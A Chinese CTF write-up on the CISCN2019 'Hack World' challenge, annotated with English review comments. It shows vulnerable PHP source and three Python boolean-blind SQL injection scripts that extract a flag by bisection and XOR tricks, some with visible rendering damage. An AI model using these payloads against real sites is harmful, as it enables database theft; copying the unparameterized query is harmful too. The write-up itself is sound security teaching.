[CISCN2019 华北赛区 Day2 Web1]Hack World

知识点:题目已经告知列名和表名为flag,接下来利用ascii和substr函数即可进行bool盲注
eg:
id=(ascii(substr((select(flag)from(flag)),1,1))<128)

0x01

看了网上的源码发现:

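<?php
// Challenge source as reproduced in the writeup, with the line breaks restored
// (the original rendering split the keyword "if" across two lines twice).
// The comments explain why the filter does not prevent injection and where the
// real fix belongs.
$dbuser='root';
$dbpass='root';
// Substring denylist applied to the raw POST value. A denylist is not an
// injection defence: the query further down is still assembled by string
// interpolation, so any MySQL syntax that is not on this list reaches the
// server unchanged. The fix belongs at the query (prepared statement or an
// integer cast), not here.
function safe($sql){
    # Filtered content; functions are essentially not filtered
    $blackList = array(' ','||','#','-',';','&','+','or','and','`','"','insert','group','limit','update','delete','*','into','union','load_file','outfile','./');
    foreach($blackList as $blackitem){
        // stripos() returns int 0 for a match at offset 0, which the original
        // bare truthiness test treated as "not found"; compare with false so a
        // listed token at the very start of the input is rejected as well.
        if(stripos($sql,$blackitem) !== false){
            return False;
        }
    }
    return True;
}
if(isset($_POST['id'])){
    $id = $_POST['id'];
}else{
    die();
}
// mysql_* functions were deprecated in PHP 5.5 and removed in PHP 7; they offer
// no parameter binding, which is why the statement below is built as text.
$db = mysql_connect("localhost",$dbuser,$dbpass);
if(!$db){
    die(mysql_error());
}
mysql_select_db("ctf",$db);
if(safe($id)){
    // Root cause: untrusted $id is interpolated unquoted into the statement.
    // Since id is numeric, `$id = intval($id);` before this line (or a
    // mysqli/PDO prepared statement with a bound parameter) closes the hole
    // regardless of what the denylist contains. Because the page echoes either
    // the row content or an error, the two outcomes are distinguishable to a
    // client, which is what the blind-injection scripts in this writeup rely on.
    $query = mysql_query("SELECT content from passage WHERE id = ${id} limit 0,1");
    if($query){
        $result = mysql_fetch_array($query);
        if($result){
            echo $result['content'];
        }else{
            echo "Error Occured When Fetch Result.";
        }
    }else{
        var_dump($query);
    }
}else{
    die("SQL Injection Checked.");
}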

过滤了一堆东西,可以看到很多函数没有过滤,
接下来就想办法借助函数构造注入就可以了。

借助substr函数截取flag中的内容,长度依次增加。用if函数判断截取出来的内容是什么,这里需要穷举。如果判断成功,返回1,否则返回2。

0x02 解题

贴上wp脚本
import requests
import time

url是随时更新的,具体的以做题时候的为准

# Per-instance challenge URL from the writeup; such URLs are short-lived.
url = 'http://40c9be7a-36f0-4e80-94ca-d1ac9e121947.node1.buuoj.cn/index.php'
data = {"id":""}
# The 'flag{' prefix (5 characters) is assumed, so probing starts at position 6.
flag = 'flag{'

i = 6
# Outer loop: one flag character per iteration. As rendered, the body below has
# lost its indentation and is not valid Python as-is.
while True:

从可打印字符开始

# Bisect over printable ASCII (32..126); each request answers one ">" comparison.
begin = 32
end = 126
tmp = (begin+end)//2
while begin<end:
    print(begin,tmp,end)
    time.sleep(1)
    # if(...) yields 1 when the probed character's code is > tmp and 2 otherwise,
    # so the server selects a different id (and thus a different or no row).
    # NOTE(review): as rendered this payload contains literal spaces, which the
    # ' ' entry of safe()'s denylist rejects — likely a rendering artifact of the
    # original post; cannot be confirmed from here.
    data["id"] = "if(ascii(substr((select       flag        from    flag),{},1))>{},1,2)".format(i,tmp)
    r = requests.post(url,data=data)
    # 'Hello' is presumably the content of the id=1 row, so its presence means the
    # comparison was true. Detection note: roughly 7 near-identical POSTs per
    # character at a fixed 1 s cadence, differing only in two integers inside
    # `if(ascii(substr(` — an easy WAF/IDS signal.
    if 'Hello' in r.text:
        begin = tmp+1
        tmp = (begin+end)//2 
    else:
        end = tmp
        tmp = (begin+end)//2

# After convergence tmp is the character code; stop once the closing brace appears.
flag+=chr(tmp)
print(flag)
i+=1
if flag[-1]=='}':
    break

0x03 解法二

看了网上的wp还有一种解法是通过异或

在爆flag的时候发现有过滤 :select,show,""……很是难受,后来在师傅的博客上看到了这种方法:

id=1^(if((ascii(substr((select(flag)from(flag)),1,1))=102),0,1))
附上脚本爆破

#!/usr/bin/python
#-*-coding:utf-8 -*-
import requests
import re

def flag_get(start: int, f: int, url: str) -> int:    # determine the character at position `start`
	"""Return 1 if the flag character at 1-based position `start` has ASCII code `f`, else 0.

	Equality oracle: `1^(if(cond,0,1))` evaluates to id 1 when `cond` holds and
	id 0 otherwise; presumably only id 1 yields a page containing 'Hello'.
	NOTE(review): the `url` parameter is ignored — it is overwritten by the
	hard-coded instance URL below.
	"""
	a='1^(if((ascii(substr((select(flag)from(flag)),'+str(start)+',1))='+str(f)+'),0,1))'
	data = {'id': a }
	url = 'http://76333ea2-9071-468b-ad3c-930e98a4ead2.node1.buuoj.cn/index.php'
	r= requests.post(url, data)
	s=r.text
	#print(s)
	if 'Hello' in s:
		return 1
	else:
		return 0

def flag_find(start: int, f: int, url: str) -> int: # determine (by comparison)
	"""Return 1 if the flag character at 1-based position `start` has ASCII code > `f`, else 0.

	Same XOR construction as flag_get(), with ">" instead of "=", so it can
	drive a bisection over the ASCII range. NOTE(review): the `url` parameter
	is ignored — it is overwritten by the hard-coded instance URL below.
	"""
	a='1^(if((ascii(substr((select(flag)from(flag)),'+str(start)+',1))>'+str(f)+'),0,1))'
	data = {'id': a }
	url = 'http://76333ea2-9071-468b-ad3c-930e98a4ead2.node1.buuoj.cn/index.php'
	r= requests.post(url, data)
	s=r.text
	#print(s)
	if 'Hello' in s:
		return 1
	else:
		return 0



if __name__ == '__main__':
	# Driver: bisect each position with flag_find(), then confirm the exact
	# character with flag_get(). Detection note: every character costs a handful
	# of POSTs that differ only in two integers inside `if((ascii(substr(` —
	# a cheap WAF/IDS signature.
	url = 'http://76333ea2-9071-468b-ad3c-930e98a4ead2.node1.buuoj.cn/index.php'
	flag_kouhao=125   # ord('}'): probed first each round to detect the end of the flag
	flag=''
	num=1       # 1-based position to recover next
	while 1:
		start=32   # lower bound of the ASCII search range (decimal)
		last=126   # upper bound of the ASCII search range (decimal)
		mid=int((start+last)/2)
		while 1:
			# Closing brace found: print the flag and stop. NOTE(review): exit(1)
			# reports failure to the shell even though this is the success path.
			if(flag_get(num,flag_kouhao,url)):
				flag=flag+'}'
				print('flag     is    :'+flag)
				exit(1)
			print('strat is '+str(start))
			print(' mid  is '+str(mid))
			print('last  is '+str(last))
			print('****************************************')

			# flag_find() == 1 means the code is > mid. The window is narrowed with
			# start=mid (not mid+1), so the loop stops once it is under 5 wide and
			# the remainder is settled by the linear scan below.
			if(flag_find(num,mid,url)):
				start=mid
				mid=int((start+last)/2)
				if ((last-start)<5):
					break
			else:
				last=mid
				mid=int((start+last)/2)
				if ((last-start)<5):
					break
		print(start)
		print(last)
		print('****************************************')
		# Linear equality scan over the remaining window; the first hit is taken.
		for i in range(start,last+1):
			print(i)
			if(flag_get(num,i,url)):
				f=chr(i)
				flag=flag+f
				print('****************************************')
				print(' num is '+str(num))
				print('char is '+f)
				print('flag is '+flag)
				print('****************************************')
				break
		num=num+1	
	print(flag)

exp2:

#-*-coding:utf-8 -*-

import requests
from lxml import etree
def a():
# Third variant. As rendered, the function body has lost its indentation, so this
# is not valid Python as-is. Same equality oracle as flag_get(), but the response
# is parsed with lxml and compared against a whole text node.
url="http://b995ff2b-d867-4580-80c2-3fd1e4b25cb4.node3.buuoj.cn/"
flag="Hello, glzjin wants a girlfriend."   # presumably the id=1 page text, used as the "true" marker
final=""
stop=0
for i in range(1,1290):   # upper bound on the flag length
# NOTE(review): rendered as `""50`; presumably `"*"*50` with the asterisks eaten by markdown.
print(""50,i,""50)
stop=0
for j in range(32,129):   # printable ASCII; j stays 128 only when nothing matched
stop = j
data={"id":"1^(if((ascii(substr((select(flag)from(flag)),%d,1))=%d),0,1))" %(i,j)}
# NOTE(review): spaces are stripped from the response here, yet `flag` still
# contains spaces, so an exact node match looks impossible as written — verify.
re = requests.post(url=url,data=data).text.replace(' ','')
html = etree.HTML(re).xpath("//text()")
# print(">>",html)
# `html` is a list of text nodes, so `in` is an exact match of one node, unlike
# the substring checks in the earlier scripts.
if flag in html:
final+=chr(j)
print(" ",final)
break

     # No candidate matched at this position: treat it as the end of the flag.
     if stop >= 128:
        print("*"*50,"结束")
        print(">>",final)
        break

# NOTE(review): rendered as `name`/`main`; the dunder underscores were most likely
# stripped by markdown rendering (compare the guard in the previous script).
if name == 'main':
a()

参考链接
https://www.cnblogs.com/kevinbruce656/p/11342580.html

https://blog.csdn.net/weixin_43345082/article/details/99062970

原文地址:https://www.cnblogs.com/wangtanzhi/p/11869684.html